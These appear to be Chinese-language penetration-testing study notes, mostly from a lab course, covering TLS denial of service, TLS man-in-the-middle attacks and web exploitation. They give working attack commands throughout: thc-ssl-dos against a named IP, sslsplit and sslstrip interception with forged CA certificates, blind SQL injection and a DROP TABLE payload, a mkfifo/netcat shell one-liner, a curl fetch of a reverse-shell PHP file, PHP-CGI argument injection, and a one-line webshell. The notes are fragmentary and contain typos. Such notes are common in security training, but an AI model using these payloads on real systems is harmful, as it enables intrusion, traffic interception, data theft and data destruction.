非对称加密算法对性能消耗大，一般只用来加密对称加密算法密钥

100服务器还有后续处

SSL/TLS拒绝服务攻击
·thc-ssl-dos
 ·SSL协商加密性能开销增加 大量握手信息请求会导致拒绝服务
 ·利用SSL secure Renegotiation特性 在单一TCP连接中上次数千个SSL连接请求 造成服务器资源过载
 ·与流量式拒绝服务攻击不同 thc-ssl-dos可以利用dsl线路打掉30M的带宽服务器
 ·服务器平均可以处理300次/秒SSL握手请求
 ·对SMTPS POP#S等服务同样有效
 ·thc-ssl-dos 199.223.209.205 2083 --accept
·对策
 ·禁用SSL-Renegotiation 使用SSLAccelerator
 ·通过修改thc-ssl-dos代码 可以绕过以上对策

·另一个工具Mitmproxy
 · mitmproxy -T --host（默认侦听主机8080端口 无论是ssl 还是http） -w mitmproxy.log（保存）
会自动伪造证书
在终端会时刻显示内容  并且可以点击查看

在之前需要iptables转发规则
iptables -t nat -F 
 iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 
 iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --toport 8080 

·另一个工具
将客户端到中间人的流量变为明文
sslstrip -l 8080 （侦听8080端口）
把https传输变为http传输  因此不会证书不信任的错误

SSL/TLS中间人攻击 arp欺骗
ARP欺骗
·arpspoof欺骗网关的mac地址
启动SSLsplit
· mkdir -p test/logdir 
· sslsplit -D（DEBUG 最详细的信息） -l（记录连接信息 并保存） connect.log -j（越狱） /root/test -S（在根目录里面放所有https所有的请求数据  所以在之前要保证有目录） logdir/ -k（使用私钥） ca.key -c（使用根证书） ca.crt ssl（加密的流量 在本地所有ip地址上端口侦听） 0.0.0.0 8443 tcp（不加密的..... ） 0.0.0.0 8080 

就可以攻击了
但是 受害机会显示 证书有问题
但是可以 安装根证书 在受害机上  则可避免  但是这种方式需要 完全控制后才可以

SSL/TLS中间人攻击
SSLsplit
·透明SSL/TLS中间人攻击工具
·伪装成服务器与客户端
·伪装服务器需要伪造证书
·支持SSL/TLS加密的SMTP POP3 FTP等通信中间人攻击
利用openssl生成证书私钥
·openssl genrsa -out ca.key 2048（主流的密钥长度）
利用私钥签名生成证书
·openssl req（请求） -new（新的证书） -x509（证书格式） -days 1096（有效期） -key ca.key（生成需要的私钥） -out ca.crt   （填写基本信息  尽量贴近真实）

生成根证书后 一会会伪造相应的证书

中间人需要路由功能（操作系统的）
·启动路由
 sysctl -w net.ipv4.ip_forward=1（echo 1 > /proc/sys/net/ipv4/ip_forward）

iptables端口转发规则（发到443端口的流量 转发到sslsplit侦听的端口）（80 443端口不能被占用）
·iptables -L 来查看会泽设置
·iptables -t nat -L 查看net的规则  如果有加个-F情况掉
iptables -t nat -F
·首先 netstat -pantu | grep :444/80 然后结束掉响应
· iptables -t nat -F 
· iptables -t（使用nat表） nat -A PREROUTING（路由之前就生效的规则） -p tcp --dport 80（发给80的流量） -j REDIRECT（重定向） --to-ports 8080 （到8080端口）
· iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443（与80   8080的一样）
· iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA
除了转发TCP  其它的也可以
· iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS
· iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS 
· iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S 
· Iptables -t nat -L

·openssl s_client（作为一个客户端）-tlsl_2 -cipher "NULL,EXPORT,LOW,DES"（以不安全的cipher来连接） -connect（连接） www.baidu.com:443

·openssl cipher -v "NULL,EXPORT,LOW,DES"
https://www.openssl.org/docs/qpps/ciphers.html（加密常用网站）

Openssl 需要大量密码学相关只是 命令复杂 结果可读性差
SSLScan
·自动识别SSL配置错误 过期协议 过时cipher suite和hash算法
·默认会检查CRIME heartbleed漏洞
·绿色表示安全 红色 黄色需要注意
·TLS支持的cipher suite
  ·sslscan --tlsall www.baidu.com:443
·分析证书详细信息
  ·sslscan --show-certificate（certificate信息） --no-ciphersuite（certificate其它的信息不显示） www.baidu.com:443
SSLyze
·python编写
·检查SSL过时版本
·检查存在弱点的cipher suite
·扫面多站点 支持来源文件
·检查是否支持会话恢复
·SSLyze --regular（使用常规的插件） www.baidu.com：443

nmap --script=ssl-enum-ciphers.nse www.baidu.com

https://www.ssllabs.com/ssltest 可以直接检查扫

https攻击
web通信的SSL加密
·公钥证书
·VeriSign
·等等

加密过程
·握手 ·协商加密算法（在cipher suite里面 密钥套里选择） ·获取公钥证书 ·验证公钥证书 ·交换密钥（由客户端随机生成 然后用公钥加密后传给web由其私钥解密）（加密信息的对称密钥） ·加密信息传输 
传输中 传输内容： （明文+对称密钥）+（（明文+对称密钥）被hash加密的值）+（（hash值）公钥加密的密文） 
一层一层的加密  然后核对是否完整 这就是I

非对称算法（加密的数据小）（公钥与私钥不一样 且没有联系）
·DHke
·RSA
·ECC
对称加密算法 （密钥是一个）
·DES  3DES
·AES
·RC4

单向加密算法 HASH
碰撞攻击针对单向加密算法

SSL弱点
是不同的对称 非对称 单向加密算法组合加密
RAS/DH------密钥交换 身份验证
AES---------加密数据 
HMAC-SHA2----摘要信息
SSL会使用过时的算法
协商过程中强迫降级加密强度
购买云计算资源破解

https攻击
全站https正成为潮流趋势
·淘宝 百度
https的作用
·C机密性 I完整性 A可用性  只是在传输中
·解决的是信息传输过程中数据被篡改 窃取
·加密：对称 非对称 单向
https攻击方法
·降级攻击
·解密攻击（明文 证书伪造）
·协议漏洞 实现方法的漏洞 配置不严格

Secure socket layer
保证网络通信安全的加密协议
94年开发
99年TLS取代的ssl v3
今年来发现ssl协议漏洞被认为无法用软件修补
·heartbleed
·poodle
·beast
TLS/SSL HTTPS HTTP over SSL  被认为同义

TLS/SSL也被用于其它场景的传输通道加密
邮件加密
数据库间
LDAP身份认证服务器间
SSL VPN
远程桌面RDP通信过程中的加密和身份认证

实践（很盲注）
1' and ORD(MID((VERSION()),1,1))&1>0-- 
MID(操作数,start,length)
ORD(a)=97  Ascii码
ORD（）&1  查的是第一位  
1   1   1    1    1    1   1
128 64  32   8    4    2   1
ORD（）&32  第5位
查对应的位的 （查ascii码）
所以可以看出VERSION（）能够被替换成自己需要的信息 比如CURRENT_USER() 当前权限

无权读取information_schema库和拒绝union order by语句
执行权限低
猜列名 1' and user is not null--  如果为假 就不返回东西  为真1的返回
猜当前表名   1'and table.user in null-- 一样的
猜其它的表  1'and (select count(*) from table)>0--
猜字段内容   1'and user='admin
匹配含有a的字段内容 1' or user like '%a%
猜密码 1'or user='admin'and password='ddd131545asd54da1d231d5ad5a2as85

SQL盲注
Mysql的报错消息
·不显示数据库内建的报错信息
 ·内建的报错信息帮助开发人员开发和修复问题
 ·报错信息提供关于系统的大量有用信息
·当程序员隐藏了数据库内建的报错信息 替换为通用的错误的信息 或者显示空白页面  无法看到报错信息
·思路  基于逻辑的判断
 ·1' and 1=1-- 结果是真 那么显示1的查询信息
 ·1' and 1=2-- 结果为假  那么就不会显示1的查询信息

Medium难度与high难度
Medium难度
mysql_real_escape_string()转换特殊字符
7.0后开始使用MySQLi PDO_MYSQL 来转义
high难度
数据类型

当数据库可写（虽然权限低 却在当前目录可查 甚至可写 如果无法破解帐号密码 那么就可以写入帐号一个帐号密码（echo | md5sum -  就可以算出md5））
·';update users set user='yuanfh' where user='admin'(也可以替换密码) 闭合 结束语句 更新修改表里面的内容 users表 
 ·注入失败 Sql客户端代码问题 两条语句并行无法执行 在交互模式可以执行
·';insert into users ('user id','fist name','last name'.....) VALUES('','','',''...)添加一个用户 在每一个列名添加相应的值
·DROP TABLE users;-- 把表删了 
·xp_cmdshell/储存过程
·SQLi没有通用的方法 掌握原理 了解各种数据库特性

3 漏洞挖掘原则，命令执行
·所有变量  参看删除变量时 返回异常的变量 如果提交的符号有过滤 可以通过编码绕过
·所有头
 ·Cookie中的变量
·逐个变量删除
漏洞的本质
数据与命令混淆了 服务器端对数据过滤不严格
漏洞挖掘
·命令
应用程序开发者直接调用操作系统功能
使用操作系统的命令  看一下返回结果 是否与操作系统返回的一样吗
操作系统命令执行可以用；来一次执行 
通过猜测服务器端的代码
与写代码一样 所以这就是一个思路（ping的小知识 windows值ping3个包 linux一直ping 所以-c 3   ping3个包）
&&也可以  不过当涉及到符号时 可能会编码绕过
&是并行的命令
| 加命令也可以  || 也是一样的（前面失败再执行后面的命令）
查看源码 过滤用户输入
问题 绕过是否为数字
;mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
在kali中写一反弹php 然后让dvwa执行这个指令
但是这个反弹shell的在哪里执行  反弹的是哪个服务器的shell
那么这个作用就是 使用肉鸡去攻击其它机器
;curl http://1.1.1.1/反弹.php

二 身份验证
1 身份认证介绍
常用弱口令/基于字典的密码baopo
锁定帐号
信息收集
·手机号
·密码错误提示信息
密码嗅探

2 会话sessionID
·Xss/Cookie importer 导入正确ID cookie manage 
·SessionID in URL
·嗅探
·SessionID 长期不变/永久不变
·SessionID生成算法
 ·Sequencer
 ·私有算法
 ·预判下一次SessionID
 ·登出后返回测试

2 默认安装-Ubuntu/Debian默认安装cgi模块（在php代码里面使用cgi就可以直接执行系统命令 方便程序员操作）
php存在另一个目录 不再网页主目录 爬网爬不出
Ubuntu/Debian默认安装PHP5-cgi
可直接访问/cgi-bin/php5和/cgi-bin/php（爬不出的目录）
http://192.168.56.101/cgi-bin/php?-d+allow_url_inlcude=on+-d+ disable_funtions="" -d open_basedir=none -d auto_prepend_file=dphp://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
让服务器主动打开端口 去侦听 然后拿shell
mkfifo /tmp/pipe;sh /tmp/pipe | nc -nlp 4444 > /tmp/pipe
mk一个fifo（放在/tmp/pipe）进行管道到/tmp/pipe 又sh /tmp/pipe 

手动漏洞挖掘
一 默认安装

1 默认安装-phpmyadmin
Windows默认安装后会开放一些端口 会有漏洞
远程操作漏洞
phpmyadmin/setup
POST http://192.168.56.101/phpMyAdmin/setup/不用登录 既可以访问 管理后台数据库

利用：
（1）
POST 
头：
http://192.168.56.101/phpMyAdmin/?-d+allow_url_inlcude%31+-d+auto_prepend_file%3dphp://input HTTP/1.1
Host:192.168.56.101
body：
<?php
passthru('id');
die();
?>
使用这个url写入php代码 使用工具重放攻击（repeater）可以用echo >重定向来写代码进去
（2）
PHP反弹shell（提交服务器请求 里面有反弹连接的shell 目的是shell在服务器执行然后反弹连接客户端的端口 本地开终端窗口监听这个端口）（拿到服务器shell）
/usr/share/webshells里面有asp等的木马
/usr/share/webshells/php-reverse-shell.php
vi一下 在内容进行修改 
nc nvvlp 端口 动态监听端口 开一个nc端口 在netstat查看端口可以更直观了解途径
ifconfig无法运行 那么可以这样
Whereis ifconfig
在ifconfig的目录下./ifconfig来使用该命令
（3）
写入webshell（在服务器写一个静态木马页面文件）
echo "<php \$cmd=\$_GET["cmd"];system(\$cmd);?>" > /var/www/3.php
服务器会把变量多虑 加\防止
网页木马的制作

APPSCAN-Glass Box
Glass Box
相当于Acusensor
Agent收集服务器端源代码信息和其它数据
主支持Java .NET平台
工具Glass Box
先生成一个 （下一个链接可以打开部署程序）
在扫描时可以使用配置 使用玻璃盒子
利用玻璃盒子灰盒扫描